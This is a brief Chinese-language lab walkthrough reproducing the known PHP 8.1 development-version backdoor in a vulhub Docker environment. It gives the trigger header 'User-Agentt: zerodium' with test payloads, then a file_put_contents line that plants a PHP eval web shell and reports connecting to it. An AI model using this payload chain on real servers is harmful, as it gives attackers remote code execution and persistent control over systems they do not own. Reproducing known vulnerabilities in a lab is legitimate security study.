1.php 8.1开发版存在后门,复现一下
漏洞环境vulhub
https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
开启环境之后访问8080端口,出现hello world代表开启成功
docker-compose up -d
后门存在于user-agentt:zerodium字段
User-Agentt: zerodiumvar_dump(2*2);
poc执行成功,然后就是phpinfo()
phpinfo()执行成功,写入shell
file_put_contents('shell.php','<?php eval($_POST["666"]);?>')
连接成功。